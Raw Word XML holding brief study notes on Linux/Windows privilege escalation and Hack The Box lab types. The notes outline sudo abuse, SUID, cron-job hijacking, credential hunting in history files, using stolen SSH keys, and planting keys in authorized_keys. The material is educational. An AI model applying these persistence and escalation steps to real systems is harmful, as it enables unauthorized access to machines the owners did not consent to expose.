          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Examine Installed Package: </w:t>
      </w:r>
      <w:r w:rsidR="00580A6D" w:rsidRPr="00580A6D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dpkg -l</w:t>
      </w:r>
      <w:r w:rsidR="00580A6D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7A59356E" w14:textId="77777777" w:rsidR="00D16451" w:rsidRPr="00321189" w:rsidRDefault="00B31436" w:rsidP="00D16451">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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User Privileges</w:t>
      </w:r>
      <w:r w:rsidR="00A1055B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="00A1055B" w:rsidRPr="00A1055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357FDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1) Sudo -l </w:t>
      </w:r>
      <w:r w:rsidR="00D1645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D16451" w:rsidRPr="00321189">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00D16451">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sudo -u user2 /bin/bash</w:t>
      </w:r>
      <w:r w:rsidR="00D16451" w:rsidRPr="00321189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3558B835" w14:textId="72F7E6EF" w:rsidR="00A1055B" w:rsidRPr="00321189" w:rsidRDefault="00357FDC" w:rsidP="00D16451">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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2) SUID</w:t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D16451"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>3) Windows Token Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B466378" w14:textId="77777777" w:rsidR="00190991" w:rsidRDefault="00C20884" w:rsidP="00FB3144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Scheduled Tasks</w:t>
      </w:r>
      <w:r w:rsidR="00A1055B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="00A1055B" w:rsidRPr="00A1055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1055B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00A1055B" w:rsidRPr="006858D0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ffect</w:t>
      </w:r>
      <w:r w:rsidR="00491547">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> running scripts that executes tasks by </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE7266E" w14:textId="4CF71ECB" w:rsidR="00190991" w:rsidRDefault="00E01F66" w:rsidP="00FB3144">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/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1) </w:t>
      </w:r>
      <w:r w:rsidR="00491547" w:rsidRPr="00491547">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Add</w:t>
      </w:r>
      <w:r w:rsidR="00491547">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ing </w:t>
      </w:r>
      <w:r w:rsidR="00491547" w:rsidRPr="00491547">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>new scheduled tasks</w:t>
      </w:r>
      <w:r w:rsidR="00A90364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F20EF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(C</w:t>
      </w:r>
      <w:r w:rsidR="00491547" w:rsidRPr="00491547">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ronjobs</w:t>
      </w:r>
      <w:r w:rsidR="005F20EF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, Crontabs,</w:t>
      </w:r>
      <w:r w:rsidR="0049154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5F20EF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cron.d)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732922A0" w14:textId="58B64956" w:rsidR="00A1055B" w:rsidRPr="00E650A0" w:rsidRDefault="00E01F66" w:rsidP="00FB3144">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/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2) </w:t>
      </w:r>
      <w:r w:rsidR="00491547" w:rsidRPr="00491547">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trick them to execute a malicious software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0263BEA5" w14:textId="76F6CAC2" w:rsidR="00A1055B" w:rsidRPr="007479AF" w:rsidRDefault="00E650A0" w:rsidP="007479AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E650A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Exposed Credentials</w:t>
      </w:r>
      <w:r w:rsidR="00A1055B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="00A1055B" w:rsidRPr="00A1055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965241">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Configuration/Log Files Or Bash History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CD7846" w14:textId="551381FD" w:rsidR="007479AF" w:rsidRPr="00EB1380" w:rsidRDefault="007479AF" w:rsidP="00EB1380">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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SSH Keys:</w:t>
      </w:r>
      <w:r w:rsidRPr="007479A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EB1380">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidR="002F313B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SSH Login with</w:t>
      </w:r>
      <w:r w:rsidR="00EB1380">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (-i id_rsa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8FB4D3" w14:textId="2D7D4B09" w:rsidR="00EB1380" w:rsidRPr="00EB1380" w:rsidRDefault="00EB1380" w:rsidP="00EB1380">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1890"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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2) SSH Key Generation with (ssh keygen -f key) then adding it to the (</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB1380">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>home/user/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629E406E" w14:textId="414B0A89" w:rsidR="006858D0" w:rsidRPr="003F1C76" w:rsidRDefault="002A6068" w:rsidP="006858D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Transferring Files</w:t>
      </w:r>
      <w:r w:rsidR="006858D0" w:rsidRPr="003F1C76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6C1AB318" w14:textId="3D585383" w:rsidR="006858D0" w:rsidRPr="00A1055B" w:rsidRDefault="00832C4E" w:rsidP="006858D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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W</w:t>
      </w:r>
      <w:r w:rsidR="006D15D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidR="006858D0" w:rsidRPr="00CA60B9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="006D15D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>World Wide Web Get (HTTP, HTTPs, FTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639BFEB8" w14:textId="04388FE3" w:rsidR="00A1055B" w:rsidRPr="00A1055B" w:rsidRDefault="00832C4E" w:rsidP="006858D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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cURL</w:t>
      </w:r>
      <w:r w:rsidR="00A1055B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="00A1055B" w:rsidRPr="00A1055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</w:rPr>
        <w:t>Copy URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E477A6" w14:textId="793FD8E4" w:rsidR="00A1055B" w:rsidRPr="00A1055B" w:rsidRDefault="002D1EC6" w:rsidP="006858D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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SCP</w:t>
      </w:r>
      <w:r w:rsidR="00A1055B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="00A1055B" w:rsidRPr="00A1055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</w:rPr>
        <w:t>Secure File Copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E1F44E" w14:textId="59D65CA8" w:rsidR="00A1055B" w:rsidRPr="00A1055B" w:rsidRDefault="00314670" w:rsidP="006858D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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Base64</w:t>
      </w:r>
      <w:r w:rsidR="00A1055B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="00A1055B" w:rsidRPr="00A1055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</w:rPr>
        <w:t>Encrypting the Data in the File then Decrypting it bach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76041B7C" w14:textId="4B62BBA9" w:rsidR="00A1055B" w:rsidRPr="00CA60B9" w:rsidRDefault="00BC6714" w:rsidP="00A1055B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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MD5 Checksum</w:t>
      </w:r>
      <w:r w:rsidR="00A1055B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="00A1055B" w:rsidRPr="00A1055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</w:rPr>
        <w:t>Ensures that the file has been copied correctly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269E98E8" w14:textId="60B31B57" w:rsidR="006858D0" w:rsidRPr="003F1C76" w:rsidRDefault="001B47AB" w:rsidP="006858D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Navigating HTB</w:t>
      </w:r>
      <w:r w:rsidR="006858D0" w:rsidRPr="003F1C76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2D5CCBA2" w14:textId="5C3D3670" w:rsidR="006858D0" w:rsidRPr="00A1055B" w:rsidRDefault="001B47AB" w:rsidP="006858D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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Tracks</w:t>
      </w:r>
      <w:r w:rsidR="006858D0" w:rsidRPr="00CA60B9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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Created by Users, Companies, and Universities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3908CFA8" w14:textId="2FCEA9BA" w:rsidR="00A1055B" w:rsidRPr="00A1055B" w:rsidRDefault="001B47AB" w:rsidP="006858D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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Machines</w:t>
      </w:r>
      <w:r w:rsidR="00A1055B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="00A1055B" w:rsidRPr="00A1055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</w:rPr>
        <w:t>Hackable Simulated Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F0EB0C" w14:textId="5577E12F" w:rsidR="00A1055B" w:rsidRPr="00A1055B" w:rsidRDefault="001B47AB" w:rsidP="006858D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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Challenges</w:t>
      </w:r>
      <w:r w:rsidR="00A1055B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="00A1055B" w:rsidRPr="00A1055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</w:rPr>
        <w:t>Various CTF Challenges in different Categories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE3C230" w14:textId="6532769A" w:rsidR="00A1055B" w:rsidRPr="00A1055B" w:rsidRDefault="00C10178" w:rsidP="006858D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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Fortress</w:t>
      </w:r>
      <w:r w:rsidR="00A1055B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="00A1055B" w:rsidRPr="00A1055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</w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10178">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ulnerable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10178">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">abs created by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10178">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">xternal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10178">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ompanies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D44C8B8" w14:textId="4F42813A" w:rsidR="00D32CC6" w:rsidRDefault="005A5B70" w:rsidP="006858D0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Endgame</w:t>
      </w:r>
      <w:r w:rsidR="00A1055B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="00A1055B" w:rsidRPr="00A1055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</w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5B70">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">irtual labs that contain several machines connected to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5B70">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45646FA0" w14:textId="067D1A9B" w:rsidR="00CD7A42" w:rsidRDefault="00CD7A42" w:rsidP="006858D0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Pro Labs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA60B9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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">imulate a </w:t>
      </w:r>
      <w:r w:rsidR="00893E33">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eal-</w:t>
      </w:r>
      <w:r w:rsidR="00893E33">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">orld </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">nterprise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nfrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087271EC" w14:textId="5EC9D85A" w:rsidR="0098153A" w:rsidRDefault="0098153A" w:rsidP="006858D0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Battlegrounds</w:t>
      </w:r>
      <w:r w:rsidRPr="0098153A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: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R</w:t>
      </w:r>
      <w:r w:rsidRPr="0098153A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eal-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="0098153A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ime </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="0098153A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ame of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="0098153A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">trategy and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="0098153A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>acking</w:t>
